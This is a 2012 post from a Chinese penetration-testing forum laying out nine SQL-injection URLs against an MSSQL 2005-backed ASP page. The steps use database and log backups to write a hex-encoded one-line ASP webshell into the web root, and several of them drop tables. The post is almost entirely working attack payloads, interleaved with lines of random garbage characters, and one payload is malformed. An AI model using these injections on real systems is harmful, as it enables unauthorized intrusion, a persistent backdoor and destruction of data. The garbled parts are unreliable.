中国网络渗透测试联盟
标题:
Mssql2005 Log备份Webshell
[打印本页]
作者:
admin
时间:
2012-9-15 14:25
标题:
Mssql2005 Log备份Webshell
第一步
) ~+ j( N9 |7 Q
http://itpro.blog.163.com/test.asp';alter/
**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
8 m8 [% A9 |' x
, `4 }2 _7 u: r! U
第二步:
! H/ o% q2 h$ k D4 m$ _
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
# J a' D: ^( l( T+ f
5 V0 R: _/ c2 B' s
第三步
8 {* m9 |8 e# F+ h
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
) b4 |: \! F- N0 l- K2 S
0 F/ l& M6 U6 @7 d1 J7 j
第四步
5 V0 K T4 K5 o
http://itpro.blog.163.com/test.asp';create/
**/table/**/[itpro]([a]/**/image)--
8 ^; Y9 Q3 H1 a4 r4 J; {6 b
8 b! l- Q: B0 | @1 r( T0 J" B
第五步
# c, i9 |3 Q/ d0 |
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
5 i8 p( ?5 ]9 P; o- J. M6 b
$ e7 q& N( O" |7 E6 h
第六步
/ }7 I! W& s+ x8 s3 ~
http://itpro.blog.163.com/test.asp';insert/
**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
3 H5 V% `- {3 c
7 U, H; E) [, I A( k6 b1 N: }! e
第七步
# B5 g+ b; S, T/ i% M
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
- t5 J6 Z- g9 Y! X% g
/ L/ `' F3 u0 _8 Q. b- u
第八步
7 P5 A j& q, p, h% W& }! V
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
0 Y) M! J; x1 f: H9 O2 U# x
! Y8 `0 ^; ? Q" v
第九步
- K1 n, K, _( D. A0 l/ R$ P( o6 u
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& J) P5 G% P1 \ e
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2